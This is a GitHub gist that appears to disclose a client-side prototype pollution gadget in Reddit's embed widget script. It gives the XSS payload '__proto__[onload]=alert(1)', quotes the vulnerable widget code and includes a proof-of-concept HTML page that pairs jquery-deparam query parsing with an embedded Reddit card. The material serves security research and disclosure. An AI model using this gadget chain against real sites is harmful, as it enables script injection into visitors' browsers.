Skip to content

Instantly share code, notes, and snippets.

@keerok

keerok/README.md

Last active October 17, 2021 14:51
Show Gist options
  • Star 8 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save keerok/52aa04c35aeb68a383727e978010a47a to your computer and use it in GitHub Desktop.
Save keerok/52aa04c35aeb68a383727e978010a47a to your computer and use it in GitHub Desktop.
Download ZIP
client-side prototype pollution gadget using cross-origin embedded reddit posts
Raw
README.md
  • the payload to trigger the XSS is __proto__[onload]=alert(1)

vulnerable code(file: http://embed.redditmedia.com/widgets/platform.js):

n.prototype.init = function(a, b, c, d) {
                if (this.elem = b,
                this.options = c,
                !c.url)
                    return this.error = !0,
                    this.frame = null,
                    !1;
                this.error = !1,
                this.frame = m.build(b, c, a),
                this._done = d;
                var g = new i
                  , h = g.callback();
                this.frame.one("card.load", function(a, b) {
                    h({
                        iframe: a,
                        doc: b
                    })
                }),
                this._extract = g.callback(),
                this.extract = e.bind(function(a) {
                    return this.extracted ? !1 : (this.extracted = !0,
                    void this._extract(a))
                }, this),
                c.embed && (this.media = g.callback());
                var j = b.parentNode;
                j && j.offsetWidth && (j.offsetWidth > 600 ? this.frame.elem.style.width = "600px" : this.frame.elem.style.width = j.offsetWidth + "px");
                var k = f.create("div", {
                    "class": "embedly-card"
                })
                  , l = f.create("div", {
                    "class": "embedly-card-hug"
                });
                k.appendChild(l),
                l.appendChild(this.frame.elem),
                j.insertBefore(k, b),
                this.frame.__appended(),
                g.wait(this.done, this)
            }
Raw
pollutionCase.html
<html>
<head>
<script src="https://rawcdn.githack.com/AceMetrix/jquery-deparam/81428b3939c4cbe488202b5fa823ad661d64fb49/jquery-deparam.js"></script>
</head>
<body>
<script>
var query = deparam(location.search.slice(1));
</script>
<blockquote class="reddit-card" data-card-created="1603396221">
<a href="https://www.reddit.com/r/Slackers/comments/c5bfmb/xss_challenge/">XSS Challenge</a>
from <a href="http://www.reddit.com/r/Slackers">r/Slackers</a>
</blockquote>
<script async src="//embed.redditmedia.com/widgets/platform.js" charset="UTF-8"></script>
<script src="https://rawcdn.githack.com/AceMetrix/jquery-deparam/81428b3939c4cbe488202b5fa823ad661d64fb49/jquery-deparam.js"></script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment